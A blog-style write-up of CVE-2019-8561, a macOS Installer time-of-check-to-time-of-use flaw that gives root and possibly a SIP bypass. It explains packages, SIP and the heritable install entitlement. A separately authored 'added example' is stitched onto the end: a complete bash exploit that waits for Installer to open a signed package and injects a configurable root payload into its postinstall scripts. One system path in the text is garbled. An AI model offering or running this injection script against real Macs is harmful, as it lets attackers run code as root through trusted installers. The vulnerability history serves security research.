(N.B. This is a half finished post that I'm publishing to share the knowledge and get it out of my drafts.)

In June 2019 at Objective by the Sea v2.0 (OBTS), Jaron Bradley dropped CVE-2019-8561. It's still worth writing about because it is wonderfully simple and gets us r00t as well as a System Integrity Protection (SIP) bypass.

In this post we'll be using GPG Suite and Apple's Pro Video Formats 2.1 as our target installer packages. This vulnerability has nothing to do with these packages: GPG Suite happens to be the only application bundled as a package installed on my MacBook, and Jaron used Pro Video Formats in his OBTS demo.

## Packages and installer

Installation packages are directories that appear as one file (.pkg) and that:

> …contain a product or product component - the package's payload - to be installed on a computer, and install configuration information that determines where and how the product is installed.

Installer is what you see after you double click GPG Suite's Install.pkg file. Installer (/usr/sbin/installer) is the system binary responsible for installing packages, and you can also use it to install packages from the command line. We can step through how to install GPG Suite via installer in Terminal.app:

1. Mount the disk image: `hdiutil attach "$HOME/Downloads/GPG_Suite-2019.2.dmg"`
2. Change into the mounted volume and execute `ls`; you should see a file named Install.pkg:

```
0xmachos on GLaDOS in /Volumes/GPG Suite
$ ls
GPGSuite-dmg.png  Install.pkg  Uninstall.app/
```

3. Tell installer which package to install and where (installing to `/` needs root): `installer -pkg "Install.pkg" -target "/"`

## SIP

SIP was introduced in OS X El Capitan (10.11). It's a security feature designed to protect the OS files on disk and at run time; in short, it prevents modification of certain OS files even by root. However, Apple still needs a way to update the OS, so:

> System Integrity Protection is designed to allow modification of these protected parts only by processes that are signed by Apple and have special entitlements to write to system files, such as Apple software updates and Apple installers.

Modification of SIP protected files requires the com.apple.rootless.install entitlement. Any Apple signed package or software will be installed by system_installd. You can see which system binaries have this entitlement by looking it up in Jonathan Levin's entitlements database. I first heard of this binary in Howard Oakley's post How your Mac can download an old 'security' update by accident.

We can use Jonathan Levin's tool jtool (or `codesign -d --entitlements :-`) to dump system_installd's entitlements:

```
$ jtool -ent /System/Library/PrivateFrameworks/amework/Versions/A/Resources/system_installd
```

One of them is com.apple.rootless.install.heritable. Any binary with that entitlement affords the child processes it spawns the ability to inherit it, so any package system_installd installs will have the ability to modify SIP protected files. Patrick Wardle wrote about how this entitlement could be abused to bypass SIP in his 2016 post Bypassing Apple's System Integrity Protection.

## The TOCTOU bug

This is a Time of Check Time of Use (TOCTOU) bug within installer and system_installd (PackageKit). Between a .pkg being double clicked and it being loaded by Installer there is a small window for an attacker to expand the .pkg and modify its contents. Installer's user interface will still show that the package is correctly code signed, and installer will execute the modified files.

In theory all we have to do to exploit the TOCTOU bug is:

1. Monitor /var/log/install.log for a package being installed.
2. Expand the package.
3. Modify the package contents to add a payload.

```bash
expand_path="/tmp/Install" # Location to expand pkg into

# Detect package install starting (block until installer logs "Opened from:")
( tail -f -n 0 /var/log/install.log & ) | grep -q 'Opened from:'

# Extract package location (the path is everything after the sixth field)
pkg_path=$(grep 'Opened from:' /var/log/install.log | tail -1 | cut -d ' ' -f7-)

# Expand package
pkgutil --expand "$pkg_path" "$expand_path"
```

In reality it's slightly more complicated, but not by much. There are some permission issues that need to be accounted for, and a separate TOCTOU issue that affects how much space the system thinks the target disk image (.dmg) has, if your target package comes on a disk image. We also need to work around read-only disk images. You can view my full, working, r00t Proof of Concept (PoC) script gpg_poc for all the details.

## SIP Bypass

As mentioned above, any binary with the com.apple.rootless.install.heritable entitlement affords its child processes the ability to bypass SIP. Jaron already did the hard work: he found that the Pro Video Formats package (the one Apple ships for Final Cut Pro) is installed with that heritable entitlement. So in theory all we need to do is find a package with that entitlement and exploit the same TOCTOU bug. This post is half finished so I never managed to get a SIP bypass PoC working.
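The three-step race from the TOCTOU section above, written out as an added example; this is not the post's gpg_poc script, and the parts the post leaves out are assumptions: `pkgutil --expand` / `pkgutil --flatten` for the expand and re-pack steps, the payload being appended to an existing postinstall script in the expanded package, and the target .pkg living on a writable volume (the post's permission and read-only disk image workarounds are not attempted). The install.log lines are constructed samples in the shape the original script's `cut -f7-` expects, not real log data.

```bash
#!/bin/bash
# Added example (not the post's gpg_poc). Wait for installer to log that it
# opened a package, expand that package, append a payload to its postinstall
# script(s) and flatten it back over the original path. Functions only at
# top level, so the file can be sourced for the self-check at the bottom.

INSTALL_LOG="${INSTALL_LOG:-/var/log/install.log}"
EXPAND_PATH="${EXPAND_PATH:-/tmp/Install}"
# Appended to each postinstall script; runs as root when the package installs.
PAYLOAD="${PAYLOAD:-touch /tmp/r00t}"

# Constructed sample lines (date, time, host, process[pid]:, "Opened from:",
# path). Assumed format, used only to exercise the parsing functions.
SAMPLE_LOG_OLD='2019-08-29 13:58:40+01:00 GLaDOS installer[4201]: Opened from: /Users/0xmachos/Downloads/Other.pkg'
SAMPLE_LOG_NEW='2019-08-29 14:02:11+01:00 GLaDOS installer[4242]: Opened from: /Volumes/GPG Suite/Install.pkg'

# Path portion of an "Opened from:" line. Everything after the marker is the
# path, so a volume name with spaces ("/Volumes/GPG Suite") stays intact,
# which field counting with cut would also survive but only by luck.
pkg_path_from_line() {
    printf '%s\n' "$1" | sed -n 's/^.*Opened from: //p'
}

# Path of the most recently opened package recorded in the given log file.
# Returns 1 if the log has no "Opened from:" line yet.
last_opened_pkg() {
    local line
    line=$(grep 'Opened from:' "$1" | tail -n 1)
    [ -n "$line" ] || return 1
    pkg_path_from_line "$line"
}

# Block until installer appends a new "Opened from:" line. The backgrounded
# tail is orphaned once grep exits and dies on SIGPIPE at its next write,
# the same trick the original script uses.
wait_for_pkg_open() {
    ( tail -f -n 0 "$INSTALL_LOG" & ) | grep -q 'Opened from:'
    last_opened_pkg "$INSTALL_LOG"
}

# Expand the flat package, append PAYLOAD to every postinstall script in it,
# flatten to a temporary file and rename it over the original. A package with
# no postinstall would also need a <scripts> entry in its PackageInfo, which
# this example deliberately does not fabricate.
inject_payload() {
    local pkg="$1" count tmp_pkg
    rm -rf "$EXPAND_PATH"
    pkgutil --expand "$pkg" "$EXPAND_PATH" || return 1
    count=$(find "$EXPAND_PATH" -path '*/Scripts/postinstall' -type f | wc -l | tr -d ' ')
    if [ "$count" -eq 0 ]; then
        echo "no postinstall script to piggyback on in $pkg" >&2
        return 1
    fi
    find "$EXPAND_PATH" -path '*/Scripts/postinstall' -type f \
        -exec sh -c 'printf "\n%s\n" "$1" >> "$2"' _ "$PAYLOAD" {} \;
    tmp_pkg="${pkg}.tmp.$$"
    pkgutil --flatten "$EXPAND_PATH" "$tmp_pkg" || return 1
    mv -f "$tmp_pkg" "$pkg"   # assumption: installer re-reads from this path
}

# Entry point: run as `./race.sh --run` on the target Mac, then open the
# victim package in Installer. Nothing runs when the file is merely sourced.
main() {
    local pkg
    echo "waiting for installer to open a package (log: $INSTALL_LOG)" >&2
    pkg=$(wait_for_pkg_open) || return 1
    echo "installer opened: $pkg" >&2
    inject_payload "$pkg"
}

if [ "${1:-}" = "--run" ]; then main; fi
```

`sed` is used instead of the original `cut -d ' ' -f7-` so that the path is not shifted if a process or host field ever contains a space; the two constructed lines above are enough to check both the parser and the "latest line wins" behaviour of `last_opened_pkg` without touching /var/log/install.log.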